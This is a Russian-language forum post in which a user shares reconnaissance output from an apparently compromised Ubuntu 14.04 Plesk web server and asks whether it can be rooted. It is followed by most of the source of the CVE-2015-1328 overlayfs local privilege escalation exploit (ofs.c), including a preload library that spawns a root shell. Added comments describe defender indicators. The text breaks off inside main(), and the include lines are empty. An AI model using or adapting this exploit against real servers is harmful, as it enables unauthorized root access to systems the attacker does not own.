Сообщение от
d4rk73rr0r
Подскажите, пожалуйста, можно ли рутить этот сервер?
$ uname -a 2>&1
Код:
Linux zdes byl hostname 3.13.0-40-generic #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ ls -la /boot 2>&1
Код:
total 652860
drwxr-xr-x 3 root root 12288 Jun 20 08:15 .
drwxr-xr-x 24 root root 4096 Jun 16 08:07 ..
-rw------- 1 root root 3372643 May 3 2014 System.map-3.13.0-24-generic
-rw------- 1 root root 3378267 Jun 5 2014 System.map-3.13.0-29-generic
-rw------- 1 root root 3378641 Jul 5 2014 System.map-3.13.0-30-generic
-rw------- 1 root root 3381262 Jul 15 2014 System.map-3.13.0-32-generic
-rw------- 1 root root 3381262 Jul 29 2014 System.map-3.13.0-33-generic
-rw------- 1 root root 3381262 Aug 13 2014 System.map-3.13.0-34-generic
-rw------- 1 root root 3386444 Aug 15 2014 System.map-3.13.0-35-generic
-rw------- 1 root root 3386479 Sep 4 2014 System.map-3.13.0-36-generic
-rw------- 1 root root 3386945 Sep 23 2014 System.map-3.13.0-37-generic
-rw------- 1 root root 3386936 Oct 28 2014 System.map-3.13.0-39-generic
-rw------- 1 root root 3387231 Nov 13 2014 System.map-3.13.0-40-generic
-rw------- 1 root root 3388792 Nov 25 2014 System.map-3.13.0-41-generic
-rw------- 1 root root 3388760 Dec 9 2014 System.map-3.13.0-43-generic
-rw------- 1 root root 3388834 Dec 16 2014 System.map-3.13.0-44-generic
-rw------- 1 root root 3389458 Mar 11 01:43 System.map-3.13.0-46-generic
-rw------- 1 root root 3389235 Mar 12 16:52 System.map-3.13.0-48-generic
-rw------- 1 root root 3389437 Apr 11 02:05 System.map-3.13.0-49-generic
-rw------- 1 root root 3389875 Apr 15 18:03 System.map-3.13.0-51-generic
-rw------- 1 root root 3389875 May 4 10:09 System.map-3.13.0-52-generic
-rw------- 1 root root 3390132 May 20 16:11 System.map-3.13.0-53-generic
-rw------- 1 root root 3390881 May 27 01:11 System.map-3.13.0-54-generic
-rw------- 1 root root 3390881 Jun 18 06:03 System.map-3.13.0-55-generic
-rw-r--r-- 1 root root 1158016 May 3 2014 abi-3.13.0-24-generic
-rw-r--r-- 1 root root 1161764 Jun 5 2014 abi-3.13.0-29-generic
-rw-r--r-- 1 root root 1162257 Jul 5 2014 abi-3.13.0-30-generic
-rw-r--r-- 1 root root 1162712 Jul 15 2014 abi-3.13.0-32-generic
-rw-r--r-- 1 root root 1162712 Jul 29 2014 abi-3.13.0-33-generic
-rw-r--r-- 1 root root 1162712 Aug 13 2014 abi-3.13.0-34-generic
-rw-r--r-- 1 root root 1163858 Aug 15 2014 abi-3.13.0-35-generic
-rw-r--r-- 1 root root 1163858 Sep 4 2014 abi-3.13.0-36-generic
-rw-r--r-- 1 root root 1164489 Sep 23 2014 abi-3.13.0-37-generic
-rw-r--r-- 1 root root 1164547 Oct 28 2014 abi-3.13.0-39-generic
-rw-r--r-- 1 root root 1164509 Nov 13 2014 abi-3.13.0-40-generic
-rw-r--r-- 1 root root 1164720 Nov 25 2014 abi-3.13.0-41-generic
-rw-r--r-- 1 root root 1164720 Dec 9 2014 abi-3.13.0-43-generic
-rw-r--r-- 1 root root 1164720 Dec 16 2014 abi-3.13.0-44-generic
-rw-r--r-- 1 root root 1164852 Mar 11 01:43 abi-3.13.0-46-generic
-rw-r--r-- 1 root root 1164723 Mar 12 16:52 abi-3.13.0-48-generic
-rw-r--r-- 1 root root 1164723 Apr 11 02:05 abi-3.13.0-49-generic
-rw-r--r-- 1 root root 1164671 Apr 15 18:03 abi-3.13.0-51-generic
-rw-r--r-- 1 root root 1164671 May 4 10:09 abi-3.13.0-52-generic
-rw-r--r-- 1 root root 1164671 May 20 16:11 abi-3.13.0-53-generic
-rw-r--r-- 1 root root 1164806 May 27 01:11 abi-3.13.0-54-generic
-rw-r--r-- 1 root root 1164806 Jun 18 06:03 abi-3.13.0-55-generic
-rw-r--r-- 1 root root 165510 May 3 2014 config-3.13.0-24-generic
-rw-r--r-- 1 root root 165544 Jun 5 2014 config-3.13.0-29-generic
-rw-r--r-- 1 root root 165576 Jul 5 2014 config-3.13.0-30-generic
-rw-r--r-- 1 root root 165611 Jul 15 2014 config-3.13.0-32-generic
-rw-r--r-- 1 root root 165611 Jul 29 2014 config-3.13.0-33-generic
-rw-r--r-- 1 root root 165611 Aug 13 2014 config-3.13.0-34-generic
-rw-r--r-- 1 root root 165652 Aug 15 2014 config-3.13.0-35-generic
-rw-r--r-- 1 root root 165671 Sep 4 2014 config-3.13.0-36-generic
-rw-r--r-- 1 root root 165712 Sep 23 2014 config-3.13.0-37-generic
-rw-r--r-- 1 root root 165712 Oct 28 2014 config-3.13.0-39-generic
-rw-r--r-- 1 root root 165745 Nov 13 2014 config-3.13.0-40-generic
-rw-r--r-- 1 root root 165745 Nov 25 2014 config-3.13.0-41-generic
-rw-r--r-- 1 root root 165745 Dec 9 2014 config-3.13.0-43-generic
-rw-r--r-- 1 root root 165748 Dec 16 2014 config-3.13.0-44-generic
-rw-r--r-- 1 root root 165748 Mar 11 01:43 config-3.13.0-46-generic
-rw-r--r-- 1 root root 165773 Mar 12 16:52 config-3.13.0-48-generic
-rw-r--r-- 1 root root 165773 Apr 11 02:05 config-3.13.0-49-generic
-rw-r--r-- 1 root root 165762 Apr 15 18:03 config-3.13.0-51-generic
-rw-r--r-- 1 root root 165762 May 4 10:09 config-3.13.0-52-generic
-rw-r--r-- 1 root root 165762 May 20 16:11 config-3.13.0-53-generic
-rw-r--r-- 1 root root 165762 May 27 01:11 config-3.13.0-54-generic
-rw-r--r-- 1 root root 165762 Jun 18 06:03 config-3.13.0-55-generic
drwxr-xr-x 5 root root 4096 Jun 20 08:15 grub
-rw-r--r-- 1 root root 19692919 Jun 25 2014 initrd.img-3.13.0-24-generic
-rw-r--r-- 1 root root 19693496 Jun 25 2014 initrd.img-3.13.0-29-generic
-rw-r--r-- 1 root root 19802843 Jul 10 2014 initrd.img-3.13.0-30-generic
-rw-r--r-- 1 root root 19805892 Jul 30 2014 initrd.img-3.13.0-32-generic
-rw-r--r-- 1 root root 19806330 Aug 12 2014 initrd.img-3.13.0-33-generic
-rw-r--r-- 1 root root 19807084 Aug 14 2014 initrd.img-3.13.0-34-generic
-rw-r--r-- 1 root root 19814700 Aug 29 2014 initrd.img-3.13.0-35-generic
-rw-r--r-- 1 root root 19827146 Sep 23 2014 initrd.img-3.13.0-36-generic
-rw-r--r-- 1 root root 19826914 Oct 9 2014 initrd.img-3.13.0-37-generic
-rw-r--r-- 1 root root 19826798 Oct 30 2014 initrd.img-3.13.0-39-generic
-rw-r--r-- 1 root root 19831562 Nov 25 2014 initrd.img-3.13.0-40-generic
-rw-r--r-- 1 root root 19857194 Dec 11 2014 initrd.img-3.13.0-41-generic
-rw-r--r-- 1 root root 19858798 Dec 12 2014 initrd.img-3.13.0-43-generic
-rw-r--r-- 1 root root 19860064 Jan 13 2015 initrd.img-3.13.0-44-generic
-rw-r--r-- 1 root root 19863695 Mar 12 07:53 initrd.img-3.13.0-46-generic
-rw-r--r-- 1 root root 19862856 Mar 24 07:52 initrd.img-3.13.0-48-generic
-rw-r--r-- 1 root root 19864189 Apr 14 08:09 initrd.img-3.13.0-49-generic
-rw-r--r-- 1 root root 19862129 Apr 30 08:11 initrd.img-3.13.0-51-generic
-rw-r--r-- 1 root root 19865264 May 7 08:07 initrd.img-3.13.0-52-generic
-rw-r--r-- 1 root root 19864608 May 22 08:48 initrd.img-3.13.0-53-generic
-rw-r--r-- 1 root root 19864503 Jun 11 08:24 initrd.img-3.13.0-54-generic
-rw-r--r-- 1 root root 19863440 Jun 20 08:15 initrd.img-3.13.0-55-generic
-rw-r--r-- 1 root root 176500 Mar 12 2014 memtest86+.bin
-rw-r--r-- 1 root root 178176 Mar 12 2014 memtest86+.elf
-rw-r--r-- 1 root root 178680 Mar 12 2014 memtest86+_multiboot.bin
-rw------- 1 root root 5776416 May 3 2014 vmlinuz-3.13.0-24-generic
-rw------- 1 root root 5792544 Jun 5 2014 vmlinuz-3.13.0-29-generic
-rw------- 1 root root 5792608 Jul 5 2014 vmlinuz-3.13.0-30-generic
-rw------- 1 root root 5798112 Jul 15 2014 vmlinuz-3.13.0-32-generic
-rw------- 1 root root 5798688 Jul 29 2014 vmlinuz-3.13.0-33-generic
-rw------- 1 root root 5797728 Aug 13 2014 vmlinuz-3.13.0-34-generic
-rw------- 1 root root 5806368 Aug 15 2014 vmlinuz-3.13.0-35-generic
-rw------- 1 root root 5806848 Sep 4 2014 vmlinuz-3.13.0-36-generic
-rw------- 1 root root 5808832 Sep 23 2014 vmlinuz-3.13.0-37-generic
-rw------- 1 root root 5808544 Oct 28 2014 vmlinuz-3.13.0-39-generic
-rw------- 1 root root 5808960 Nov 13 2014 vmlinuz-3.13.0-40-generic
-rw------- 1 root root 5814112 Nov 25 2014 vmlinuz-3.13.0-41-generic
-rw------- 1 root root 5814080 Dec 9 2014 vmlinuz-3.13.0-43-generic
-rw------- 1 root root 5814496 Dec 16 2014 vmlinuz-3.13.0-44-generic
-rw------- 1 root root 5814592 Mar 11 01:43 vmlinuz-3.13.0-46-generic
-rw------- 1 root root 5815680 Mar 12 16:52 vmlinuz-3.13.0-48-generic
-rw------- 1 root root 5815392 Apr 11 02:05 vmlinuz-3.13.0-49-generic
-rw------- 1 root root 5818368 Apr 15 18:03 vmlinuz-3.13.0-51-generic
-rw------- 1 root root 5818592 May 4 10:09 vmlinuz-3.13.0-52-generic
-rw------- 1 root root 5821152 May 20 16:11 vmlinuz-3.13.0-53-generic
-rw------- 1 root root 5821664 May 27 01:11 vmlinuz-3.13.0-54-generic
-rw------- 1 root root 5821984 Jun 18 06:03 vmlinuz-3.13.0-55-generic
ls -la --full-time /lib 2>&1
Код:
total 312
drwxr-xr-x 23 root root 4096 2015-02-27 08:01:04.121244740 +0500 .
drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 ..
drwxr-xr-x 2 root root 4096 2014-11-21 07:40:33.676606953 +0500 apparmor
lrwxrwxrwx 1 root root 21 2014-07-11 16:04:40.744028161 +0500 cpp -> /etc/alternatives/cpp
drwxr-xr-x 3 root root 4096 2014-06-24 11:04:14.153311413 +0500 crda
drwxr-xr-x 81 root root 20480 2015-06-16 08:07:19.308506965 +0500 firmware
drwxr-xr-x 2 root root 4096 2014-06-24 11:08:09.613305094 +0500 hdparm
drwxr-xr-x 2 root root 12288 2015-02-27 08:01:04.121244740 +0500 i386-linux-gnu
drwxr-xr-x 2 root root 4096 2014-06-27 11:51:14.108394221 +0500 ifupdown
drwxr-xr-x 2 root root 4096 2014-07-30 11:27:25.309402444 +0500 init
-rwxr-xr-x 1 root root 71512 2013-12-24 07:51:15.000000000 +0500 klibc-P2s_k-gf23VtrGgO2_4pGkQgwMY.so
lrwxrwxrwx 1 root root 25 2015-02-25 21:58:43.000000000 +0500 ld-linux.so.2 -> i386-linux-gnu/ld-2.19.so
lrwxrwxrwx 1 root root 17 2014-01-09 03:32:00.000000000 +0500 libip4tc.so.0 -> libip4tc.so.0.1.0
-rw-r--r-- 1 root root 27392 2014-01-09 03:32:05.000000000 +0500 libip4tc.so.0.1.0
lrwxrwxrwx 1 root root 17 2014-01-09 03:32:00.000000000 +0500 libip6tc.so.0 -> libip6tc.so.0.1.0
-rw-r--r-- 1 root root 31520 2014-01-09 03:32:05.000000000 +0500 libip6tc.so.0.1.0
lrwxrwxrwx 1 root root 16 2014-01-09 03:32:00.000000000 +0500 libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r-- 1 root root 5816 2014-01-09 03:32:05.000000000 +0500 libiptc.so.0.0.0
lrwxrwxrwx 1 root root 20 2014-01-09 03:32:00.000000000 +0500 libxtables.so.10 -> libxtables.so.10.0.0
-rw-r--r-- 1 root root 47712 2014-01-09 03:32:06.000000000 +0500 libxtables.so.10.0.0
drwxr-xr-x 3 root root 4096 2014-06-24 11:03:45.029312194 +0500 lsb
drwxr-xr-x 2 root root 4096 2015-06-20 08:14:04.183221689 +0500 modprobe.d
drwxr-xr-x 24 root root 4096 2015-06-16 08:07:17.752507007 +0500 modules
drwxr-xr-x 2 root root 4096 2015-05-22 08:46:32.470408887 +0500 modules-load.d
drwxr-xr-x 3 root root 4096 2014-06-24 11:03:45.029312194 +0500 plymouth
drwxr-xr-x 3 root root 4096 2014-06-24 11:10:30.041301325 +0500 recovery-mode
drwxr-xr-x 2 root root 4096 2014-06-27 11:51:03.188394514 +0500 resolvconf
drwxr-xr-x 2 root root 4096 2014-07-11 15:54:31.320044515 +0500 security
drwxr-xr-x 3 root root 4096 2014-07-10 17:19:11.242226794 +0500 systemd
drwxr-xr-x 15 root root 4096 2014-06-24 11:03:45.029312194 +0500 terminfo
drwxr-xr-x 4 root root 4096 2014-07-11 15:54:50.304044005 +0500 udev
drwxr-xr-x 2 root root 4096 2014-06-24 11:12:34.149297995 +0500 ufw
drwxr-xr-x 4 root root 12288 2015-06-12 08:11:58.733773878 +0500 x86_64-linux-gnu
drwxr-xr-x 2 root root 4096 2014-06-24 11:08:13.173304998 +0500 xtables
ls -la --full-time /lib64 2>&1
Код:
total 8
drwxr-xr-x 2 root root 4096 2015-02-27 08:01:05.833244694 +0500 .
drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 ..
lrwxrwxrwx 1 root root 32 2015-02-25 21:56:31.000000000 +0500 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so
$ mount 2>&1
Код:
/dev/md0 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/cgroup type tmpfs (rw)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
none on /sys/fs/pstore type pstore (rw)
/dev/md1 on /opt type ext4 (rw,usrquota)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
$ df -h 2>&1
Код:
Filesystem Size Used Avail Use% Mounted on
/dev/md0 459G 215G 221G 50% /
none 4.0K 0 4.0K 0% /sys/fs/cgroup
udev 3.8G 4.0K 3.8G 1% /dev
tmpfs 768M 1.8M 767M 1% /run
none 5.0M 0 5.0M 0% /run/lock
none 3.8G 16K 3.8G 1% /run/shm
none 100M 0 100M 0% /run/user
/dev/md1 1.8T 48G 1.7T 3% /opt
$ cat /etc/issue 2>&1
Код:
Ubuntu 14.04.1 LTS \n \l
$ cat /etc/crontab 2>&1
Код:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
# ClamAV refresh virus databases
30 1 * * * root freshclam >/dev/null 2>&1
# ClamAV checking vhosts directory and sending email to admins
0 2 * * * root /adm/clamav.sh >/dev/null 2>&1
$ ls -la /etc/cron.d 2>&1
Код:
total 44
drwxr-xr-x 2 root root 4096 Apr 21 08:16 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rw------- 1 root root 260 Jul 11 2014 awstats
-rw-r--r-- 1 root root 1566 Feb 3 2014 mailman
-rw-r--r-- 1 root root 589 Feb 28 2014 mdadm
-rw-r--r-- 1 root root 510 Jul 7 2014 php5
-rw-r--r-- 1 root root 110 Jul 11 2014 plesk-backup-manager-task
-rw-r--r-- 1 root root 156 Aug 7 2014 plesk-outgoing-mail-statistics-poller
$ ls -la /etc/cron.hourly 2>&1
Код:
total 20
drwxr-xr-x 2 root root 4096 Jun 24 2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
$ ls -la /etc/cron.monthly 2>&1
Код:
total 24
drwxr-xr-x 2 root root 4096 Jul 11 2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 190 Jun 25 2014 50plesk-monthly
$ ls -la /etc/cron.weekly 2>&1
Код:
total 40
drwxr-xr-x 2 root root 4096 Jul 11 2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 189 Jun 25 2014 50plesk-weekly
-rwxr-xr-x 1 root root 730 Feb 23 2014 apt-xapian-index
-rwxr-xr-x 1 root root 427 Apr 16 2014 fstrim
-rwxr-xr-x 1 root root 771 Apr 10 2014 man-db
-rwxr-xr-x 1 root root 211 Apr 10 2014 update-notifier-common
$ cat /proc/version 2>&1
Код:
Linux version 3.13.0-40-generic (buildd@comet) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014
$ cat /proc/sys/vm/mmap_min_addr 2>&1
$ ls -la /usr/bin/staprun 2>&1
Код:
ls: cannot access /usr/bin/staprun: No such file or directory
$ pwd 2>&1
Код:
/opt/www/vhosts/hostname.domain/logs
[CODE]
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= *=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT
user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= *=*=*=*=*=*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
/*
 * LIB - C source text for a small shared object, held as a string literal.
 *
 * The embedded source defines a replacement getuid(). On each call it looks
 * up the real getuid with dlsym() and reads the /proc/self/exe link. When the
 * calling process has effective uid 0 and that link reads "/bin/su", it
 * unlinks /etc/ld.so.preload and /tmp/ofs-lib.so, sets real/effective/saved
 * uid and gid to 0 and replaces the process with an interactive /bin/sh.
 * In every other process it just returns the real getuid() value.
 *
 * Defender notes: the two unlink() calls mean the preload entry and the
 * library remove themselves the first time the hook fires, so their absence
 * on disk afterwards does not show the host was untouched. An unexpected
 * /etc/ld.so.preload, a /tmp/ofs-lib.so file, or an interactive sh whose
 * parent is a su invocation are the artifacts this string refers to.
 */
#define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"
/* 1 MiB static buffer; main() passes its top address to clone() as the child's stack. */
static char child_stack[1024*1024];
/*
 * child_exec - clone() entry point that performs the two overlay mounts of
 * the CVE-2015-1328 proof of concept described in the file header.
 *
 * stuff: unused; the visible clone() call in main() passes NULL.
 *
 * main() calls unshare(CLONE_NEWUSER) and then clone() with CLONE_NEWNS
 * before this runs, so the mount() calls below are issued from a new mount
 * namespace inside an unprivileged user namespace.
 *
 * Return: no value is returned; the function falls off the end of its body
 * although it is declared int. It calls exit(-1) when neither mount variant
 * succeeds. Return values of system/mkdir/chdir/rename/chmod/umount are not
 * checked.
 *
 * Defender notes: the header states that Ubuntu kernels built before
 * 2015-06-15 are affected, so the fix is to run (not merely install) a later
 * kernel build. Host artifacts visible in this function are the
 * /tmp/ns_sploit directory tree, overlay/overlayfs mounts on
 * /tmp/ns_sploit/o, and a mode-0777 ld.so.preload. Where overlayfs is not
 * needed, keeping the module from loading also closes this path
 * (NOTE(review): confirm against the vendor advisory for the release).
 */
static int
child_exec(void *stuff)
{
char *file;
/* Reset the staging tree: lower/upper/work directories and mount point "o". */
system("rm -rf /tmp/ns_sploit");
mkdir("/tmp/ns_sploit", 0777);
mkdir("/tmp/ns_sploit/work", 0777);
mkdir("/tmp/ns_sploit/upper",0777);
mkdir("/tmp/ns_sploit/o",0777);
fprintf(stderr,"mount #1\n");
/* First attempt uses the older "overlayfs" type with a /proc directory as lowerdir. */
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
/* Neither type could be mounted from the user namespace: the run ends here. */
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
exit(-1);
}
/* Fallback path picks a file from the securityfs lower directory. */
file = ".access";
chmod("/tmp/ns_sploit/work/work",0777);
} else file = "ns_last_pid";
/*
 * Rename the chosen lower-layer file to "ld.so.preload" through the merged
 * view. Presumably this relies on the permission-handling flaw named in the
 * header, leaving a copy in upperdir that keeps the lower file's ownership
 * - TODO confirm against the CVE description.
 */
chdir("/tmp/ns_sploit/o");
rename(file,"ld.so.preload");
chdir("/");
umount("/tmp/ns_sploit/o");
fprintf(stderr,"mount #2\n");
/* Second overlay: the staged upper directory becomes lowerdir and /etc becomes upperdir. */
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
exit(-1);
}
chmod("/tmp/ns_sploit/work/work",0777);
}
/*
 * chmod through the merged view; per the transcript in the file header the
 * outcome is "/etc/ld.so.preload created". A world-writable
 * /etc/ld.so.preload is therefore the key indicator to check for.
 */
chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
umount("/tmp/ns_sploit/o");
}
int
main(int argc, char **argv)
{
int status, fd, lib;
pid_t wrapper, init;
int clone_flags = CLONE_NEWNS | SIGCHLD;
fprintf(stderr,"spawning threads\n");
if((wrapper = fork()) == 0) {
if(unshare(CLONE_NEWUSER) != 0)
fprintf(stderr, "failed to create new user namespace\n");
if((init = fork()) == 0) {
pid_t pid =
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
if(pid